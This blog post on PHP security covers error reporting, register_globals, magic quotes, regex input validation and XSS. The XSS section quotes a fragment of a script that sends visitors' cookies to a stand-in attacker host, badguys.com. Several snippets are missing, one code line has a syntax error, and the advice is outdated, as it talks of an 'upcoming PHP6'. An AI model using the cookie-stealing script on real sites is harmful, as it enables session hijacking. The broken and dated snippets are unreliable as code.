Oct 12

Create Secure PHP Applications

Error Reporting

When you are going to live your application in php then make sure to hide all error reporting . This is done by invoking following simple function.


By default error reporting setting in php

error_reporting(E_ALL ^ E_NOTICE);

You can also set the error according to your need at the time of development.

Report simple running errors
error_reporting(E_ERROR | E_WARNING | E_PARSE);

variables or catch variable name misspellings …)
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);

Report all PHP errors

Disable PHP’s “Bad Features”

Some features in php make easier for developer to develop application but some of these helpful feature can have unintended consequences. Some of these features have also been removed in the upcoming PHP6, but are ubiquitous in PHP4 applications and are only deprecated in PHP5 applications.

Register Globals (register_globals)

register_globals was meant help rapid application development. Make sure register_globals is off in live application.


Above example have a query string the register_globals (On) access this query string by $var instead of $_GET[‘var’] automatically. This might sound useful to you, but unfortunately all variables in the code now have this property, and we can now easily get into PHP applications that do not protect against this unintended consequence.

Some example code
if(isset($_POST['xbutton'] && $_POST['xbutton']=='test')

if register_globals is on then a user just pass in query string access=1 and access your script data. Unfortunately, we cannot disable register_globals from the script side but we can disable it using .htaccess. .htaccess code given below for register_globals disabled.

php_flag register_globals 0

Magic Quotes (magic_quotes_gpc, magic_quotes_runtime, magic_quotes_sybase)

Magic Quotes associate with some problem like addslashes() : if both magic quotes and
addslashes() are used. If this is the case, then you end up with multiple slashes being added, causing errors. The second problem is if you make the assumption magic quotes is turned on and it actually is
not. Then all the input goes unchecked. The third problem is that magic quotes only escapes single and double quotes, but if you are using a database engine, there are also many database-specific characters that also need to be escaped. So, it recommended use that you disable this feature and use proper variable validation instead

Unfortunately, we cannot disable Magic Quotes from the script side but we can disable it using .htaccess. .htaccess code given below for Magic Quotes disabled.

php_flag magic_quotes_gpc 0 php_flag magic_quotes_runtime 0

Validate Input

escaping characters a great way to protect input is to validate it. actually we know that what kind of data are expecting on input. So we can protect against attacks to make sure users can only enter the appropriate data.
For example, We accept a month as a digit between 1-12, a day between 1-31 and a year in the format of YYYY.

if ( ! preg_match( "/^[0-9]{1,2}$/", $_GET['month'] ) )
// handle error
if ( ! preg_match( "/^[0-9]{1,2}$/", $_GET['day'] ) )
// handle error
if ( ! preg_match( "/^[0-9]{4}$/", $_GET['year'] ) )
// handle error

XSS (Cross Site Scripting)

The essence of any XSS attack is the injection of code (usually JavaScript code but it can be any client-side code) into the output of your PHP script. This attack is possible when you display input that was sent to you, such as you would do with a forum posting.

For example, if your application included a forum in which people could post messages to be read by other users, a malicious user could embed a <script> tag, shown below, which would reload the page to a site controlled by them, pass your cookie and session information as GET variables to their page, then reload your page as though nothing had happened. The malicious user could thereby collect other users’ cookie and session information, and use this data in a session hijacking or other attack on your site.


document.location =

‘http://www.badguys.com/cgi-bin/cookie.php?’ +



So, Protect above scripting attack is to disallow HTML altogether, because then there is no possible way to allow any JavaScript to execute. However, if you do this then formatting is also disallowed, which is not always an option for forum and blog software.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>